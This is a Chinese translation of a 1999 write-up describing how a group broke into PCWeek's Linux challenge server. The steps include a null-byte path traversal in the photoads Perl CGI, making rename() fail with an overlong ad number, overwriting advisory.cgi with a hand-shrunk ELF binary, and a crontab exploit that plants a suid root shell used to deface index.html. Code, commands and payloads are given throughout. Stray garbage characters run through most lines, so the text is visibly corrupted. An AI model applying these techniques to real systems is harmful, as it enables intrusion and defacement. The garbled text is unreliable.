JFS侵入PCWEEK-LINUX主机的详细过程

译者注：PCWeek-Linux 主机是著名电脑杂志 PCWeek 为了测试 WEB 服务器 IIS（NT平台）
! }7 |7 }7 x, {) N3 \和 Apache（Linux平台）的安全性，提供给黑客/骇客攻击的两台主机之一。另一台主机安装
+ |. A1 y+ u, l- f5 U! F9 }的是 IIS（NT平台）。详细情况请访问网站：http://www.hackpcweek.com/。
8 n5 k. c1 ]2 a/ q3 E# j% M
3 t* i% o8 K; J* N( X2 [
1 s( o2 D' R: [7 Q; h首先要进行的当然是——收集远端主机信息：打开的端口和提供的网络服务等。经过扫
" i2 Q  F$ {! O+ G4 r! {( [: m4 |! N描后发现大多数端口都被过滤掉了，原因可能是安装了防火墙或设置了 TCP-Wrapper 。所
/ X! _+ R- M" v3 n以我们只能从 HTTP 服务器着手了。
# t8 ~7 e2 \, V" m  K
lemming:~# telnet securelinux.hackpcweek.com 80
Trying 208.184.64.170...
7 g! X- l& K( O( FConnected to securelinux.hackpcweek.com.
7 N7 ]. _9 F+ Z6 U+ O/ cEscape character is '^]'.
1 r& f6 i6 Y5 L7 a+ ^, C# KPOST X HTTP/1.0
1 ^8 e7 C! v# [' L
. M! ]8 a. y$ D2 B) R0 h1 eHTTP/1.1 400 Bad Request
Date: Fri, 24 Sep 1999 23:42:15 GMT
, d3 g' h- n  a6 `( `Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
(...)
Connection closed by foreign host.
lemming:~#

嗯，服务器操作系统是 Red Hat，WEB服务器是 Apache/1.3.6。从网页上可知服务器安
. `& X: Z. Q! m! o- R装了 mod_perl，但只有一个 fingerprint 功能，对我们没有什么用处。
Apache 1.3.6 本身没有包含任何可供远端用户使用的CGI程序，但我们不清楚Red Hat
, E- j  l0 ?! v0 R1 J6 Y1 l- I的发行版本中是否有，所以我们进行了一些测试（test-cgi, wwwboard, count.cgi等）。
结果令人失望。于是我们尝试找出网站的结构。经过对该网站HTML页的分析，终于找出
4 ]7 D9 c2 _, n2 {. Z6 \, `( A了网站DocumentRoot下的目录结构：
0 l8 C5 N% k% ?  r: e! [, ]( d
# E9 C* a! ^! O. u; D/
! u  [. C* h! H7 n( T- @/cgi-bin
, L5 [9 {0 o  _/ i/photoads/
6 C! H# G' U. w  `( z% m/photoads/cgi-bin

很自然地，我们的眼光落在 photoads 这个安装模块上。该商用CGI包可在"http://
$ q  ~+ s# o0 ?www.hoffoce.com"找到，价格为$149，包括供检查和修改用的PERL源代码。
4 x9 D2 A7 x1 W. l) a我们找到一个朋友，了解和掌握 photoads 在 Linux 平台上的安装情况，从而大致清楚
运行在该主机上的 photoads。
检查了缺省安装的文件后，我们发现可以取得所有用户名及其口令的数据库（http://
6 c# f) `* _" [% N, e9 q# I, Jsecurelinux.hackpcweek.com/photoads/ads_data.pl），但当我们试图访问配置文件
/photoads/cgi-bin/photo_cfg.pl 时，服务器的设置拒绝了这个请求。
通过 /photoads/cgi-bin/env.cgi，我们可以知道该服务器的许多详细情况，如
1 d- l8 k' R, W. ?& ?( G; T6 j4 ]; t: {DocumentRoot 在文件系统的位置（/home/httpd/html），运行 Apache 服务器的用户（
  Q# _. o6 O' C  tnobody）等。
9 v' Y6 H) n) [1 A现在，开始寻找漏洞的第一步，我们尝试寻找是否存在 SSI 或 mod_perl 嵌入 HTML
2 k: [$ a4 \  o; S命令的漏洞，如：

<!--#include file="..."--> for SSI
/ a$ f7 l% v# p0 S6 j; r3 j<!--#perl ...--> for mod_perl
) Q  P  {5 C& K7 P, W' |5 \8 s
但脚本中的匹配表达式却在许多输入域上过滤此类输入。不过与此同时我们却发现有一
个用户赋值的变量在转换成 HTML 代码前，并没有检查其值的合法性。我们可以通过它将命
6 I4 ?& J% f3 j; p令嵌入到由服务器端解析的 HTML 代码中：
% s4 z* Q7 y5 c& D- r0 T5 ^3 b# C
在 post.cgi，行 36：
% j$ L/ n/ O- E- K9 Pprint "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";
: k6 m( R% u5 j2 _; b
& h- y1 b  F, A$ENV{'HTTP_REFERER'}是一个用户赋值的变量，我们可以通过它将任何 HTML 嵌入到代
码中。
请阅读我们提供的文件 getit.ssi 和 getit.mod_perl。
在命令行下使用这些文件如下：
8 r7 }+ @( L0 x8 Z. ?- o
lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80
# O# L  Y8 [0 ^( O/ V+ N  A% O
但不幸的是，该主机的配置并不允许 SSI 或 mod_perl，所以我们无法利用这个方法侵
入系统。

/ @; l5 [! O, Z因此我们决定在CGI脚本中寻找缺口。在PERL脚本中许多漏洞往往出现在 open()、
system() 或 `` 等调用中，前一个允许读/写/执行，而后两个允许执行。
% k. m* F- Q' f5 ~- @6 x虽然在该主机找不到后两种调用，但我们却发现了一些 open() 调用：

8 L* [$ v+ J, a5 z# s, P8 E- K5 [* vlemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more
7 R" f! k$ q9 C% A+ w
advisory.cgi: open (DATA, "$BaseDir/$DataFile");
; y/ N' h8 i7 J/ q6 |) y4 [edit.cgi: open (DATA, ">$BaseDir/$DataFile");
6 ^0 W* L% C- ledit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
- {& y' Q& l- a9 ^3 m9 a, Y, `& sphoto.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
8 \9 F! {6 o9 W0 m- dphoto.cgi: open ( FILE, $filename );
(...)

/ d2 x' z; P" t: [' j  k$BaseDir 和 $DataFile 两个变量是在配置文件中定义，且不能在运行时修改，无法被
- @1 _3 T! F: A& a$ g我们利用。
但其余两个就……

在 photo.cgi，行 132：
$write_file = $Upload_Dir.$filename;

6 @8 H7 r& [+ u; ]- h6 H  fopen(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
print ULFD $UPLOAD{'FILE_CONTENT'};
close(ULFD);
( W1 s. ^! ^. B6 H2 Q: ^/ t
0 N9 J' J& Y! U' }; U& t0 I/ C因此，如果我们可以修改 $write_file 变量，就可以写文件系统中的任何文件。
$write_file 变量来自：
0 d7 r5 ^" s$ l, g) c3 X
$write_file = $Upload_Dir.$filename;
& b$ b2 }9 s8 d3 \$ S  _
3 T. t# r, C8 v7 C3 D其中，$Upload_Dir 在配置文件中定义，我们无法修改，但 $filename 变量又如何呢？
, k5 @- R9 \3 k0 C( ?7 ~: S0 ^
在 photo.cgi，行 226：
- X* [7 ]" o0 Z$ B3 pif( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }
5 Q2 h$ U% w7 c, I# R0 t
8 x, F& f& u. {, i* ~8 i$filename = lc($UPLOAD{'FILE_NAME'});
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
- R& o/ O$ B" I% x3 r3 q% T
3 C1 F, V" M& J/ ~5 ?0 v7 I# Eif ($filename =~ m/gif/) {
5 i, l3 _! P' r1 y( {8 U; Q) H$type = '.gif';
}elsif ($filename =~ m/jpg/) {
$type = '.jpg';
8 W7 S$ m: n. a: D}else{
" Y2 J7 p( b3 w{&Not_Valid_Image}
}

- M- X# @2 L' K5 |+ h" k由此可知，该变量来自从提交表格的变量组分解出来的 $UPLOAD{'FILE_NAME'}，而且必
' L: A0 L0 ~- a  J须经过匹配表达式过滤，因此我们不能用"../../../../../../../../etc/passwd"格式来取
* B; h# ^6 x- s" P3 b$ A% t, c得任何文件。匹配表达式为：

$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
; g& v, A- f0 l( n5 ~5 @
/ ]- u' F* N+ M' x. s2 k我们看到，如 $filename 与该表达式匹配，则返回ASCII码1（SOH）。同时，变量还必
. `$ \( A( ^6 t7 q% g须包含"gif"或"jpg"，以通过 Not_Valid_Image 过滤器。
- U% `6 e$ }) b! Q8 I经过多次尝试，以及从 Phrack 的关于PERL CGI安全性文章的帮助，我们发现以下格式
, D) c# o. [& D8 z" f8 k
/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif

! z  g/ n$ Q3 U  P' R1 d4 ~7 f+ S可以成功修改WEB服务器根目录下的index.html文件。:-)
然而，为了上载文件，我们仍须绕过更多的脚本代码。我们发现无法通过POST方法发送
包含上述内容的表格（无法转换%00），唯一的方法只能是GET。
+ {. u. d/ m; q) c4 {) k在 photo.cgi ，行 256，会检查被上载文件的内容是否符合图像定义（宽/长/大小）
: h( V* t1 F" c. t（记住，photo.cgi 是被当作某个AD上载图像的一个方法）。如果不符合这些细节，脚本将
删除该上载文件。这当然不是我们所希望的！
PCWeek 网站配置文件将 Imagesize 设为 0，所以我们可以忽略该脚本中有关JPG部分，
0 F( R: `: u* U# q. O而将主要精力集中在GIF上。

if ( substr ( $filename, -4, 4 ) eq ".gif" ) {
open ( FILE, $filename );
my $head;
# J& C# z% l  D) a2 Fmy $gHeadFmt = "A6vvb8CC";
2 C0 j4 b/ ~- @% `, K: T. G9 bmy $pictDescFmt = "vvvvb8";
read FILE, $head, 13;
2 J) t& F! Q# l(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
close FILE;
$PhotoWidth = $width;
9 r: n- x3 |1 F2 g2 y7 T$PhotoHeight = $height;
+ b9 y; e" R# L( f+ r. X" F; S$PhotoSize = $size;
return;
! Z1 q% s- v9 x6 S$ B& o}
( T2 ~9 a9 l) r; v# m2 z
在 photo.cgi，行 140：
0 b. W# D. E- `) R5 [
if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
{&Not_Valid_Image}
}

5 m( |! ]/ L9 \: {if ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
, ]( e6 y8 J( Y( G( K{&Height_Width}
}

3 s& B$ [/ j$ [0 ~1 f  b7 w5 \由上可知，$PhotoWidth不能大于700，不能为空，且不能大于 $ImgWidth（缺省为350）
( n1 j; s/ N4 C. y  k。
* t/ d+ ]. y5 _# B所以我们使 $PhotoWidth!="" 且 $Photowidth<350 即可。
对于 $PhotoHeight，则必须小于 $ImgHeight（缺省为250）。
综合以上要求，我们可以得到一个可以使用的数据：$PhotoWidth==$PhotoHeight==0。
% [9 i! Y0 l6 T& y研究提取该值的脚本后，我们唯一要做的就是将文件的第6至第9字节的值置为 ASCII 码 0
2 n6 Q! F4 A* |) x& a（NUL）。
" s- W* s0 x9 i* w2 {6 M9 |  t在确保 FILE_CONTENT（文件内容）符合以上所有要求后，我们又在以下代码遇到了另一
. P3 m) N5 \, S' q% F9 @个问题：

chmod 0755, $Upload_Dir.$filename;
$ @8 K* o( K. k3 U$newname = $AdNum;
1 T, i8 P+ w3 F/ T2 `rename("$write_file", "$Upload_Dir/$newname");

; T/ G5 h0 e. B& hShow_Upload_Success($write_file);
# Y; u, @) a7 G$ y$ D* H
哇！文件将被改名/移动（这可是我们绝对不希望的！）。
查找 $AdNum 变量的最终处理过程，我们发现它只能包含数字：

$UPLOAD{'AdNum'} =~ tr/0-9//cd;
$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
$AdNum = $UPLOAD{'AdNum'};
9 f- R+ A# X$ D
. I0 R# `; J9 k& n* m其余的字符将被删除。因此我们不能直接应用"../../../"这种方法。
) c* U$ P1 G! I* S' ^% A) a那么，应该怎样做呢？我们看到 rename() 函数需要两个参数：旧的路径和新的路径。
哈哈，在函数过程中没有错误检查！当函数出错后将跳到下一行继续执行！那么如何才能使
该函数失败呢？Linux 内核对文件名长度限制为1024字节。因此如能使脚本将文件改名时新
文件名超过1024字节长，即可绕过这个过滤器。
所以，下一步就是要向系统传递一个大约1024字节长的AD号码。但由于脚本仅允许我们
发送对应AD号码已存在的图片，而且由系统产生一个10^1024（10的1024次幂，即小数点前有
4 h- _3 j$ z$ ^, F1024个数字——backend注）的AD号码要花的时间对我们来说似乎太长了。;-)
: v* u+ B8 U. x& f, f1 j5 T' c我们又遇到另一个难题了！……

7 ^$ h8 E& C  E. ?" P我们发现输入错误检查函数可以帮助我们创建一个指定的AD号码！浏览 edit.cgi 脚本
后，你也许就会想到：如果输入是一个文件名+回车符+一个1024位的数字，会产生什么结果
2 w$ J/ I: t( @& `3 Y) P# q呢？;-)
) s8 h$ W5 u+ W" H# |2 D( a5 n$ `请阅读用于创建新AD值的程序文件 long.adnum。
当成功绕过 $AdNum 的检查后，我们就可以让脚本创建/覆盖用户 nobody 有权写的任何
文件，其中包含了我们所希望的东西（GIF头部的NUL除外）。
7 S. E4 o  n5 N- Z+ M" {
+ ^& `! i% M1 D* }现在就让我们对该主机试一试这个方法。
$ _9 b) k% e( G嗯，so far so good（一切顺利）。但当我们试图让脚本改写 index.html 文件时无法
6 s9 W: Q. i7 g7 F成功。:( 其中的原因可能是没有覆盖该文件的权限（该文件由root拥有）。

5 O  n1 @5 X2 c; F6 X
让我们试一下是否还有其它入侵方法……

3 R# y/ A) U2 C: V' r. Q0 r  X" q; X我们决定尝试修改CGI程序，以使其按我们的意愿运行:)。这种方法还可以让我们搜寻那
些“绝密”文件，然后拿出动卖。:)
我们修改了“覆盖”脚本，并让其成功地覆盖了一个CGI！:) 为了不覆盖那些较为重要
的CGI（这是提高隐蔽性的聪明法子——backend注），最后我们选择了 advisory.cgi（你知
7 S8 |% D7 [5 u% l- o) l/ H- O/ s2 \道它有什么用吗？:)）
# X# C8 g5 V) J: i& g现在，我们将要上载一个shell脚本，以便我们可以执行一些命令。呵呵
然而，这个以CGI方式运行的shell脚本必须符合以下格式：
! A! p( @. R: x& E2 A4 S4 C# A
#!/bin/sh
5 m+ @! N9 e6 D3 necho "Content-type: text/html"
find / "*secret*" -print

同时要记得，第6至第9字节必须为0或很小的值，以符合上面提及的大小定义……

#!/bi\00\00\00\00n/sh

以上这种方法是行不通的，内核只会读取前5个字节（#!/bi）内容并执行。在该主机中
我们无法只用三个字节去获得一个shell。又遇到难题了！:(

让我们看一下ELF（Linux缺省可执行类型）二进制文件格式，就会发现那些位置字节的
, r4 y1 ]& L4 |内容均为0x00。:) Yohoo :)
, D6 N# J: w# G  Y, F: k$ @  D解决了这个问题后，现在我们需要将这个ELF可执行文件上载到远端服务器中。注意，文
件内容必须经过编码，因为我们已知道只能通过GET方法上载，而不是POST。因此还要考虑到
5 C) `, H3 t6 X/ i9 XURI的最大长度。Apache 服务器上URI最大长度设为8190字节。别忘了，我们还有一个很长的
6 V! K6 `0 C. o3 D7 ?. M0 g1024字节的AD号码，所以经编码后的ELF文件长度限制为大约7000字节。
) }/ m1 _4 T; T* }  j
以下这个程序：

& j- F5 t1 D* ~5 F9 _% Zlemming:~/pcweek/hack/POST# cat fin.c
3 d  w# g% c4 ?#include <stdio.h>
main()
4 |! J+ C# ^; s; @' T{
printf("Content-type: text/html\n\n\r");
! U4 k( H, L. ifflush(stdout);
2 M4 @/ i: o/ b% U( Sexeclp("/usr/bin/find","find","/",0);
}
; p6 X! k3 M7 y3 b1 Q2 J0 ]
编译后：

lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*

. W1 z( h' f( q- s+ `+ e优化（清除symbols）后：
' M) m+ d5 Q( g& O. |9 X
5 j5 [7 V) r+ o5 @) Klemming:~/pcweek/hack/POST# strip fin
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
1 j4 h! K6 b/ }) s0 X( \lemming:~/pcweek/hack/POST#

9 a+ e) e. a+ _, YURL编码后：
' j1 [% \9 s% u' W
lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
! H( G1 v/ I+ E-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url
- {( K& k# t5 M) Z
这个文件大小超过了限制值。:(
6 Q0 q% N0 d5 ~: g! g; ^我们只能自行编辑二进制文件以尽量减小文件体积。这可不是一件轻松的工作，但却有
效：
9 q) W, |$ V' s
lemming:~/pcweek/hack/POST# joe fin
lemming:~/pcweek/hack/POST# ls -l fin
- F  L/ ~- F" S; o, b% d5 M3 T-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
% j! B8 T. Y2 blemming:~/pcweek/hack/POST#

4 W7 {9 D: Y! Q  S* s4 j6 S请阅读 get.sec.find文件，还有 to_url 脚本和用来运行一些基本命令的*.c文件。
% _% M' Z$ Q. X: B' X. w8 ^3 ?0 k
4 a* \0 s) T  Q: H现在，将这个CGI上载到服务器，再用浏览器访问它，如：
$ A9 P: _1 D& j
0 \! V" J6 D3 P1 V, @. @wget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi
' j; F1 I+ Y; v8 E
服务器返回的结果相当于在服务器上执行 find / 命令。:)
3 h! [9 L# W% _& j, {但我们在该服务器中找不到任何“绝密”文件，或许是nobody用户无权访问的缘故。:(
- U9 b* t" w2 [) }我们尝试了更多的命令搜索，如ls等，但仍无法找到它们的踪影。
[我怀疑这些文件是否真的保存在该服务器上！]

0 A. G; s% Y% G  X+ b) v6 R
6 }4 B% V" k3 i- o0 u好了，现在是获取 root 权限的时候了。利用最新发现的 Red Hat crontab 漏洞就可以
6 G& C. U, H; S$ Z8 V轻松做到这一点。该漏洞详情请参阅 Bugtraq 或 securityfocus 上相关文档。
我们修改了源程序以适应自己的需要，因为我们不需交互式 root shell，而是创建一个
3 i1 p9 W6 w; u6 W# r. @$ ^用户 nobody 可访问的 suid root shell，如 /tmp/.bs。我们再次上载该CGI，并运行它，
观察其运行结果。
/ ]& |2 @: c6 Q  q9 T, ?8 X我们制作了执行"ls /tmp"命令的CGI，执行后确认我们已拥有了一个 suid root shell。
另外，我们还上载了一个文件 /tmp/xx，用于修改 index.html 文件。
) y" D0 D5 V' B. O* M  A
execlp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);
% @( L3 c( b3 \5 E0 g* ^6 |, W
好了。游戏结束！:)
总共花费了大约20个小时，还算不错！呵呵。:)